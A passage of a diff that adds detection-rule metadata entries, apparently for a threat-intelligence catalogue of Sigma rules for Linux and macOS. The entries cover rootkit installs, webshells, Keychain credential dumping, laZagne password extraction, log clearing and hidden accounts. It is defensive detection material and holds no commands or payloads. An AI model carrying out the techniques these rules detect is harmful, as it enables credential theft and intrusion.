"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_info_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ], + "creation_date": "2020/10/08", + "filename": "proc_creation_lnx_system_info_discovery.yml", + "author": "\u00d6mer G\u00fcnal, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects usage of system utilities to discover system network 
connections", + "uuid": "4c519226-f0cd-4471-bd2f-6fbb2bb68a79", + "value": "System Network Connections Discovery - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_connections_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_lnx_system_network_connections_discovery.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects enumeration of local network configuration", + "uuid": "e7bd1cfa-b446-4c88-8afb-403bcd79e3fa", + "value": "System Network Discovery - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016" + ], + "creation_date": "2020/10/06", + "filename": "proc_creation_lnx_system_network_discovery.yml", + "author": "\u00d6mer G\u00fcnal and remotephone, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects execution of a the file \"execve_hijack\" which is used by the Triple Cross rootkit as a way to elevate privileges", + "uuid": "0326c3c8-7803-4a0f-8c5c-368f747f7c3e", + "value": "Triple Cross eBPF Rootkit Execve Hijack", + "meta": { + "refs": [ + 
"https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation" + ], + "creation_date": "2022/07/05", + "filename": "proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects default install commands of the Triple Cross eBPF rootkit based on the \"deployer.sh\" script", + "uuid": "22236d75-d5a0-4287-bf06-c93b1770860f", + "value": "Triple Cross eBPF Rootkit Install Commands", + "meta": { + "refs": [ + "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1014" + ], + "creation_date": "2022/07/05", + "filename": "proc_creation_lnx_triple_cross_rootkit_install.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious sub processes of web server processes", + "uuid": "818f7b24-0fba-4c49-a073-8b755573b9c7", + "value": "Linux Webshell Indicators", + "meta": { + "refs": [ + "https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/", + "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml" 
+ ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2021/10/15", + "filename": "proc_creation_lnx_webshell_detection.yml", + "author": "Florian Roth, Nasreddine Bencherchali (update)", + "level": "high", + "falsepositive": [ + "Web applications that invoke Linux command line tools" + ], + "logsource.category": "process_creation", + "logsource.product": "linux" + } + }, + { + "description": "Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges.", + "uuid": "23c43900-e732-45a4-8354-63e4a6c187ce", + "value": "MacOS Emond Launch Daemon", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md", + "https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_emond_launch_daemon.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.014" + ], + "creation_date": "2020/10/23", + "filename": "file_event_macos_emond_launch_daemon.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "file_event", + "logsource.product": "macos" + } + }, + { + "description": "Detects creation of startup item plist files that automatically get executed at boot initialization to establish persistence.", + "uuid": "dfe8b941-4e54-4242-b674-6b613d521962", + "value": "Startup Items", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1037.005/T1037.005.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_startup_items.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1037.005" + ], + 
"creation_date": "2020/10/14", + "filename": "file_event_macos_startup_items.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "file_event", + "logsource.product": "macos" + } + }, + { + "description": "Detects execution of AppleScript of the macOS scripting language AppleScript.", + "uuid": "1bc2e6c5-0885-472b-bed6-be5ea8eace55", + "value": "MacOS Scripting Interpreter AppleScript", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.002/T1059.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_applescript.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.002" + ], + "creation_date": "2020/10/21", + "filename": "proc_creation_macos_applescript.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "medium", + "falsepositive": [ + "Application installers might contain scripts as part of the installation process." 
+ ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", + "uuid": "719c22d7-c11a-4f2c-93a6-2cfdd5412f68", + "value": "Decode Base64 Encoded Text -MacOs", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_base64_decode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_macos_base64_decode.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. 
This rule detect using dd and truncate to add a junk data to file.", + "uuid": "95361ce5-c891-4b0a-87ca-e24607884a96", + "value": "Binary Padding - MacOS", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_binary_padding.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.001" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_macos_binary_padding.yml", + "author": "Igor Fits, Mikhail Larin, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate script work" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detect file time attribute change to hide new or changes to existing files", + "uuid": "88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0", + "value": "File Time Attribute Change", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_change_file_time_attr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.006" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_macos_change_file_time_attr.yml", + "author": "Igor Fits, Mikhail Larin, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects deletion of local audit logs", + "uuid": "acf61bd8-d814-4272-81f0-a7a269aa69aa", + "value": "Indicator Removal on Host - Clear Mac System Logs", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.002" + ], + "creation_date": "2020/10/11", + "filename": "proc_creation_macos_clear_system_logs.yml", + "author": "remotephone, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.", + "uuid": "51719bf5-e4fd-4e44-8ba8-b830e7ac0731", + "value": "Creation Of A Local User Account", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_account.yml" + ], + "tags": [ + "attack.t1136.001", + "attack.persistence" + ], + "creation_date": "2020/10/06", + "filename": "proc_creation_macos_create_account.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option", + "uuid": "b22a5b36-2431-493a-8be1-0bae56c28ef3", + "value": "Hidden User Creation", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_create_hidden_account.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.002" + ], + "creation_date": 
"2020/10/10", + "filename": "proc_creation_macos_create_hidden_account.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects passwords dumps from Keychain", + "uuid": "b120b587-a4c2-4b94-875d-99c9807d6955", + "value": "Credentials from Password Stores - Keychain", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md", + "https://gist.github.com/Capybara/6228955", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.001" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_macos_creds_from_keychain.yml", + "author": "Tim Ismilyaev, oscd.community, Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects disabling security tools", + "uuid": "ff39f1a6-84ac-476f-a1af-37fcdf53d7c0", + "value": "Disable Security Tools", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_macos_disable_security_tools.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + 
"description": "Detects usage of system utilities to discover files and directories", + "uuid": "089dbdf6-b960-4bcc-90e3-ffc3480c20f6", + "value": "File and Directory Discovery - MacOS", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_file_and_directory_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_macos_file_and_directory_discovery.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detecting attempts to extract passwords with grep and laZagne", + "uuid": "53b1b378-9b06-4992-b972-dde6e423d2b4", + "value": "Credentials In Files", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_find_cred_in_files.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_macos_find_cred_in_files.yml", + "author": "Igor Fits, Mikhail Larin, oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects attempts to use system dialog prompts to capture user credentials", + "uuid": "60f1ce20-484e-41bd-85f4-ac4afec2c541", + "value": "GUI Input Capture - macOS", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md", + 
"https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1056.002" + ], + "creation_date": "2020/10/13", + "filename": "proc_creation_macos_gui_input_capture.yml", + "author": "remotephone, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administration tools and activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects enumeration of local systeam accounts on MacOS", + "uuid": "ddf36b67-e872-4507-ab2e-46bda21b842c", + "value": "Local System Accounts Discovery - MacOs", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_account.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001" + ], + "creation_date": "2020/10/08", + "filename": "proc_creation_macos_local_account.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects enumeration of local system groups", + "uuid": "89bb1f97-c7b9-40e8-b52b-7d6afbd67276", + "value": "Local Groups Discovery - MacOs", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_groups.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ], + "creation_date": "2020/10/11", + "filename": "proc_creation_macos_local_groups.yml", + "author": 
"\u00d6mer G\u00fcnal, Alejandro Ortuno, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects enumeration of local or remote network services.", + "uuid": "84bae5d4-b518-4ae0-b331-6d4afd34d00f", + "value": "MacOS Network Service Scanning", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_service_scanning.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ], + "creation_date": "2020/10/21", + "filename": "proc_creation_macos_network_service_scanning.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects the usage of tooling to sniff network traffic.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", + "uuid": "adc9bcc4-c39c-4f6b-a711-1884017bf043", + "value": "Network Sniffing - MacOs", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_sniffing.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ], + "creation_date": "2020/10/14", + "filename": "proc_creation_macos_network_sniffing.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate administration activities" + ], + 
"logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.", + "uuid": "234dc5df-40b5-49d1-bf53-0d44ce778eca", + "value": "Payload Decoded and Decrypted via Built-in Utilities", + "meta": { + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_payload_decoded_and_decrypted.yml" + ], + "tags": [ + "attack.t1059", + "attack.t1204", + "attack.execution", + "attack.t1140", + "attack.defense_evasion", + "attack.s0482", + "attack.s0402" + ], + "creation_date": "2022/10/17", + "filename": "proc_creation_macos_payload_decoded_and_decrypted.yml", + "author": "Tim Rauch (rule), Elastic (idea)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects the enumeration of other remote systems.", + "uuid": "10227522-8429-47e6-a301-f2b2d014e7ad", + "value": "Macos Remote System Discovery", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_remote_system_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ], + "creation_date": "2020/10/22", + "filename": "proc_creation_macos_remote_system_discovery.yml", + "author": 
"Alejandro Ortuno, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.", + "uuid": "7c3b43d8-d794-47d2-800a-d277715aa460", + "value": "Scheduled Cron Task/Job - MacOs", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053.003" + ], + "creation_date": "2020/10/06", + "filename": "proc_creation_macos_schedule_task_job_cron.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects attempts to use screencapture to collect macOS screenshots", + "uuid": "0877ed01-da46-4c49-8476-d49cdd80dfa7", + "value": "Screen Capture - macOS", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_screencapture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ], + "creation_date": "2020/10/13", + "filename": "proc_creation_macos_screencapture.yml", + "author": "remotephone, 
oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate user activity taking screenshots" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects usage of system utilities (only grep for now) to discover security software discovery", + "uuid": "0ed75b9c-c73b-424d-9e7d-496cd565fbe0", + "value": "Security Software Discovery - MacOs", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_security_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518.001" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_macos_security_software_discovery.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.", + "uuid": "b6e2a2e3-2d30-43b1-a4ea-071e36595690", + "value": "Space After Filename - macOS", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.006/T1036.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_space_after_filename.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.006" + ], + "creation_date": "2021/11/20", + "filename": "proc_creation_macos_space_after_filename.yml", + "author": "remotephone", + "level": "low", + "falsepositive": [ + "Mistyped commands or legitimate binaries named to match the pattern" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detection use of the 
command \"split\" to split files into parts and possible transfer.", + "uuid": "7f2bb9d5-6395-4de5-969c-70c11fbe6b12", + "value": "Split A File Into Pieces", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_split_file_into_pieces.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1030" + ], + "creation_date": "2020/10/15", + "filename": "proc_creation_macos_split_file_into_pieces.yml", + "author": "Igor Fits, Mikhail Larin, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects when the macOS Script Editor utility spawns an unusual child process.", + "uuid": "6e4dcdd1-e48b-42f7-b2d8-3b413fc58cb4", + "value": "Suspicious Execution via macOS Script Editor", + "meta": { + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685", + "https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml" + ], + "tags": [ + "attack.t1566", + "attack.t1566.002", + "attack.initial_access", + "attack.t1059", + "attack.t1059.002", + "attack.t1204", + "attack.t1204.001", + "attack.execution", + "attack.persistence", + "attack.t1553", + "attack.defense_evasion" + ], + "creation_date": "2022/10/21", + "filename": "proc_creation_macos_susp_execution_macos_script_editor.yml", + "author": "Tim Rauch (rule), Elastic (idea)", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" 
+ } + }, + { + "description": "Detects commandline operations on shell history files", + "uuid": "508a9374-ad52-4789-b568-fc358def2c65", + "value": "Suspicious History File Operations", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_histfile_operations.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.003" + ], + "creation_date": "2020/10/17", + "filename": "proc_creation_macos_susp_histfile_operations.yml", + "author": "Mikhail Larin, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administrative activity", + "Legitimate software, cleaning hist file" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.", + "uuid": "7ed2c9f7-c59d-4c82-a7e2-f859aa676099", + "value": "Suspicious MacOS Firmware Activity", + "meta": { + "refs": [ + "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml", + "https://www.manpagez.com/man/8/firmwarepasswd/", + "https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/30", + "filename": "proc_creation_macos_susp_macos_firmware_activity.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects usage of system 
utilities to discover system network connections", + "uuid": "9a7a0393-2144-4626-9bf1-7c2f5a7321db", + "value": "System Network Connections Discovery - MacOs", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_connections_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ], + "creation_date": "2020/10/19", + "filename": "proc_creation_macos_system_network_connections_discovery.yml", + "author": "Daniil Yugoslavskiy, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Detects enumeration of local network configuration", + "uuid": "58800443-f9fc-4d55-ae0c-98a3966dfb97", + "value": "System Network Discovery - macOS", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_network_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1016" + ], + "creation_date": "2020/10/06", + "filename": "proc_creation_macos_system_network_discovery.yml", + "author": "remotephone, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "process_creation", + "logsource.product": "macos" + } + }, + { + "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", + "uuid": "40b1fbe2-18ea-4ee7-be47-0294285811de", + "value": "System Shutdown/Reboot - MacOs", + "meta": { + "refs": [ + 
